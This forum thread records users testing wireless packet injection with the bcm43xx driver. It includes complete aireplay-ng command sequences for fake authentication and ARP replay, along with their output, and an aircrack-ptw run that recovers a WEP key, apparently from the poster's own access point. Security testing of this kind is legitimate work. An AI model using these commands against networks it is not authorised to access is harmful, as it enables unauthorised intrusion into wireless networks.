bcm43xx injection support (it works!)

[theprez98]

Testing still in progress, but Aireplay attack 9 (injection test) says it's working...

Code:

bt ~ # iwconfig eth0
eth0      IEEE 802.11b/g  ESSID:off/any  Nickname:"Broadcom 4318"
          Mode:Monitor  Frequency=2.437 GHz  Access Point: Invalid
          Bit Rate=1 Mb/s   Tx-Power=18 dBm
          RTS thr:off   Fragment thr:off
          Encryption key:off
          Link Quality=0/100  Signal level=-256 dBm  Noise level=-256 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

bt ~ # ifconfig eth0 up
bt ~ # iwconfig eth0 mode Monitor channel 6
bt ~ # aireplay-ng -9 -e WOPR -a 00:14:BF:1C:CF:E3 eth0
11:59:46  Trying broadcast probe requests...
11:59:47  No Answer...
11:59:47  Found 1 AP

11:59:47  Trying directed probe requests...
11:59:47  00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
11:59:53  Ping (min/avg/max): 1.608ms/29.276ms/137.090ms
11:59:53  9/30: 30%

11:59:53  Injection is working!

[theprez98]

UPDATE

Injection works with bcm43xx!

Aireplay-ng attacks 1 and 3...

I injected for ~60 seconds and captured ~5400 IVs with airodump.

Code:

bt ~ # aireplay-ng -1 0 -e WOPR -a $AP -h $WIFI eth0
12:24:20  Waiting for beacon frame (BSSID: 00:14:BF:1C:CF:E3)
12:24:20  Sending Authentication Request
12:24:20  Authentication successful
12:24:20  Sending Association Request
12:24:22  Association successful :-)
bt ~ # aireplay-ng -3 -b $AP -h $WIFI eth0
Saving ARP requests in replay_arp-0617-122426.cap
You should also start airodump-ng to capture replies.
12:24:32  Packets per second adjusted to 375nt 1380 packets...(240 pps)
12:24:36  Packets per second adjusted to 282ent 2033 packets...(265 pps)
12:24:43  Packets per second adjusted to 212ent 3225 packets...(262 pps)
12:24:55  Packets per second adjusted to 159ent 5245 packets...(237 pps)
12:25:04  Packets per second adjusted to 120ent 6220 packets...(216 pps)
12:25:10  Packets per second adjusted to 90sent 6599 packets...(205 pps)
12:25:12  Packets per second adjusted to 68sent 6644 packets...(203 pps)
Read 10231 packets (got 3907 ARP requests), sent 7456 packets...(164 pps)

[theprez98]

The final step was using the ptw attack:

~40,000 packets injected in <5 minutes.

Code:

bt ~ # aircrack-ptw wopr-03.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:14:BF:1C:CF:E3  keyindex=0
stats for bssid 00:14:BF:1C:CF:E3  keyindex=0 packets=39453
Found key with len 13: <<hidden>>

[theprez98]

The Wiki has been edited to reflect that the bcm43xx patch does in fact support injection.

[shamanvirtuel]

test it like this.....
aireplay-ng --test -i rausb0 eth0

rausb0 is another card in monitor mode in the same channel as eth0, it will act as an ap
eth0 is the card you want to test

will output the testings of each attack like this
attack -1 OK
attack -2 OK
attack......

it's card to card injection really useful but need 2 cards in monitor mode on the same channel

hope helps to accurate the results of testings

[theprez98]

Card to card injection not working...but as far as I am concerned, from the results above, bcm43xx does in fact support injection.

Code:

bt ~ # aireplay-ng --test -i ath1 eth0
13:55:47  Trying broadcast probe requests...
13:55:48  Injection is working!
13:55:48  Found 1 AP

13:55:48  Trying directed probe requests...
13:55:48  00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
13:55:56  Ping (min/avg/max): 1.584ms/1.601ms/1.629ms
13:55:56  3/30: 10%


13:55:56  Trying card-to-card injection...
13:55:58  Attack -0:        Failed
13:56:00  Attack -1 (open): Failed
13:56:02  Attack -1 (psk):  Failed
13:56:04  Attack -2/-3/-4:  Failed
13:56:07  Attack -5:        Failed

[shamanvirtuel]

according to this yes but strange that the attacks failed...the cards are on same channel ? it's necessary to initiate card to card injection...

but according to what i see in ur results...it works

[theprez98]

Quote:

Originally Posted by shamanvirtuel

according to this yes but strange that the attacks failed...the cards are on same channel ? it's necessary to initiate card to card injection...

but according to what i see in ur results...it works

I'll check again when I get home...can't work too hard on Father's Day!!!

[theprez98]

I re-initialized both cards monitor mode ensuring they were both on the same channel...with the exception of attack 5, the test shows that the bcm43xx driver is not only patched for injection, but works. A manual test of attack 5 also failed.

Code:

bt ~ # aireplay-ng --test -i eth0 ath2
18:14:19  Trying broadcast probe requests...
18:14:19  Injection is working!
18:14:20  Found 1 AP

18:14:20  Trying directed probe requests...
18:14:20  00:14:BF:1C:CF:E3 - channel: 6 - 'WOPR'
18:14:23  Ping (min/avg/max): 1.606ms/37.455ms/141.992ms
18:14:23  22/30: 73%


18:14:23  Trying card-to-card injection...
18:14:23  Attack -0:        OK
18:14:23  Attack -1 (open): OK
18:14:23  Attack -1 (psk):  OK
18:14:23  Attack -2/-3/-4:  OK
18:14:25  Attack -5:        Failed

[Barry]

SSID is WOPR? That's funny!